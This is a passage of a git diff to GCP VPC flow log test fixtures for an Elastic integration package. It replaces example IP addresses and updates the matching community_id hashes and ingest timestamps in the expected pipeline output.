+{"insertId":"14iipwlfd8t01d","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":34646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:10.529541195Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:10.413397239Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01g","jsonPayload":{"bytes_sent":"5044","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"87","reporter":"DEST","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01l","jsonPayload":{"bytes_sent":"14132","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"91","reporter":"DEST","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01b","jsonPayload":{"bytes_sent":"151213","connection":{"dest_ip":"67.43.156.13","dest_port":33574,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"68","reporter":"SRC","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} diff --git a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json index 8e8f54b8b32..852d0346b78 100644 --- a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json +++ b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json @@ -12,9 +12,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 33478, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -28,7 +28,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Eav+HA4T0zQk7MDzMdHH6Hhsx2A=", + "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -43,7 +43,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { @@ -67,8 +67,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868368700Z", - "original": "{\"insertId\":\"ut8lbrffooxyw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":33478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391119800Z", + "original": "{\"insertId\":\"ut8lbrffooxyw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:45:37.186193305Z", "end": "2019-06-14T03:45:37.301953198Z", @@ -95,18 +95,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 173663, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 68 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:e5cZeUPf9fWSqRY+SUSG302spGE=", + "community_id": "1:MxkJSlVhiCttfItp2SdfNMtLgEY=", "bytes": 173663, "name": "default", "transport": "tcp", @@ -128,7 +128,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -165,8 +165,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868386700Z", - "original": "{\"insertId\":\"ut8lbrffooxzb\",\"jsonPayload\":{\"bytes_sent\":\"173663\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"68\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391145800Z", + "original": "{\"insertId\":\"ut8lbrffooxzb\",\"jsonPayload\":{\"bytes_sent\":\"173663\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"68\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466657665Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -187,10 +187,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33576, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -204,7 +204,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:06oSJgliwJ21tZTkobvsHx/M+Pc=", + "community_id": "1:FYaJFSEAKLcBCMFoT6sR5TMHf/s=", "bytes": 155707, "name": "default", "transport": "tcp", @@ -227,7 +227,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -263,8 +263,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868391500Z", - "original": "{\"insertId\":\"ut8lbrffooxze\",\"jsonPayload\":{\"bytes_sent\":\"155707\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821143836Z\",\"packets_sent\":\"78\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391169Z", + "original": "{\"insertId\":\"ut8lbrffooxze\",\"jsonPayload\":{\"bytes_sent\":\"155707\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821143836Z\",\"packets_sent\":\"78\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510622432Z", "end": "2019-06-14T03:49:51.821143836Z", @@ -287,9 +287,9 @@ "as": { "number": 49505 }, - "address": "192.0.2.23", + "address": "192.168.2.23", "port": 59679, - "ip": "192.0.2.23" + "ip": "192.168.2.23" }, "source": { "address": "10.139.99.242", @@ -303,7 +303,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:E803d6gSw9j7F6zoCo0Ka6fb9Iw=", + "community_id": "1:MRmF95Hv0PHOjUO7gqbVt98osmo=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -318,7 +318,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.23" + "192.168.2.23" ] }, "gcp": { @@ -339,8 +339,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868395300Z", - "original": "{\"insertId\":\"ut8lbrffooxyz\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.0.2.23\",\"dest_port\":59679,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391173100Z", + "original": "{\"insertId\":\"ut8lbrffooxyz\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.168.2.23\",\"dest_port\":59679,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:45.860349247Z", "end": "2019-06-14T03:40:46.031032701Z", @@ -361,9 +361,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 50646, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -377,7 +377,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:IPqv9ifIl7xO904fG0KpG1HbMz8=", + "community_id": "1:++9/JiESSUdwTGGcxwXk4RA0lY8=", "bytes": 1784, "transport": "tcp", "type": "ipv4", @@ -392,7 +392,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { @@ -416,8 +416,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868398800Z", - "original": "{\"insertId\":\"ut8lbrffooxz6\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":50646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391177600Z", + "original": "{\"insertId\":\"ut8lbrffooxz6\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:36.895188084Z", "end": "2019-06-14T03:40:37.048196137Z", @@ -444,17 +444,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 50646, "bytes": 1464, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:IPqv9ifIl7xO904fG0KpG1HbMz8=", + "community_id": "1:++9/JiESSUdwTGGcxwXk4RA0lY8=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -468,7 +468,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, @@ -493,8 +493,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868402Z", - "original": "{\"insertId\":\"ut8lbrffooxzf\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":50646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391183100Z", + "original": "{\"insertId\":\"ut8lbrffooxzf\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:37.048196137Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:36.895188084Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:36.895188084Z", "end": "2019-06-14T03:40:37.048196137Z", @@ -521,18 +521,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 186151, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 251 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:yZywQ4jpdohOQ9684uKWIPHHP4Y=", + "community_id": "1:pWEbJIgG8triE8M05SRo2qQc0c8=", "bytes": 186151, "name": "default", "transport": "tcp", @@ -554,7 +554,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -591,8 +591,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868405200Z", - "original": "{\"insertId\":\"ut8lbrffooxz1\",\"jsonPayload\":{\"bytes_sent\":\"186151\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391187800Z", + "original": "{\"insertId\":\"ut8lbrffooxz1\",\"jsonPayload\":{\"bytes_sent\":\"186151\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -613,10 +613,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -630,7 +630,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ee5EHtJfWgzMQEQZSyTFAwZbgus=", + "community_id": 